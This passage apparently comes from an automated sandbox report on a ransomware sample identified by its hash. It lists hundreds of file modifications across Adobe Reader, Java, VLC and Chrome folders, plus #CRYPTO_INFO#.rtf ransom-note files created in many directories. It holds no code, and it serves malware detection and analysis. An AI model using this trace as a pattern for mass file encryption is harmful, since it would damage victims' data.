DC\Reader\plug_ins\DropboxStorage.api 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\pdf-ownership-rdr-en_us.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\es-es\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\he-il\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\cs_get.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Windows Mail\WinMail.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\META-INF\MANIFEST.MF 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-swing-plaf_ja.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\images\themes\dark\cloud_secured_lg.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\jarsigner.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\feature.properties 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-swing-plaf_zh_CN.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\share_icons2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\AddressBook.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\sl-si\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\dropins\README.TXT 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\apple-touch-icon-144x144-precomposed.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\js\nls\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\ca-es\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\s_radio_unselected_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\pt-br\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\ext\jaccess.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\S_IlluNoSearchResults_180x160.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\en-gb\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\en-gb\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\selector.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\server_lg.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\gtkHandle.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\lg\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\email\adobe_logo.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\lv_get.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\hu-hu\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.swt_0.12.100.v20140530-1436.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\root\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\zh_TW\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\ko-kr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\pl-pl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\requests\README.txt 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_editpdf_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\ca-es\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\ja\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\ro-ro\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\sk-sk\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\en-gb\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\sv-se\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.bindings.nl_zh_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\jre\lib\cmm\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\jre\lib\ext\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_folder-hover_32.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\rhp_world_icon.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\fr-ma\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ecf.filetransfer_5.0.0.v20140827-1444.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\policytool.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\da-dk\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\de-de\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\sl-si\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\css\faf-main.css 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\images\themes\dark\rhp_world_icon.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\themes\dark\close-2.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\images\themes\dark\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\hu\LC_MESSAGES\vlc.mo 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-modules-favorites.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\pl-pl\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\S_IlluCCFilesEmpty_180x180.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\plugin.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\de-de\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\sk-sk\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\de-de\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-cli_ja.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-util-enumerations_ja.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.directorywatcher.nl_zh_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\jsse.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\en-il\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\it_get.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\jmap.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\Close.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\custom.lua 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\sk-sk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_empty_state.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\fr-ma\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\eu-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\js\common.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\plugins\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_fi_135x40.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\pt-br\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\nl-nl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\info.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\ja-jp\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\es-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\sv-se\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt.nl_ja_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\configuration\config.ini 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\de\LC_MESSAGES\vlc.mo 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\sk-sk\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\images\themes\dark\progress.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\DigSig.api 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\drvSOFT.x3d 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\sl-si\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\nl-nl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\es-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher.nl_ja_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\css\main.css 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\fi_get.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\en-gb\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\sv-se\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\uk-ua\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\cs-cz\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\ro-ro\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\ja-jp\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\fr-fr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\Confirmation2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\ro-ro\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Installer\chrmstp.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\es-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.SF 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.apache.commons.codec_1.6.0.v201305230611.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\ConnectSave.dotm 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\export.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\tr-tr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\hu-hu\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program 